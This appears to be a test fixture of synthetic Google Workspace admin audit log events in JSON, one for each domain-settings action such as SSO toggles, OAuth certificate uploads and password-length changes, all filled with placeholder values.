-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} 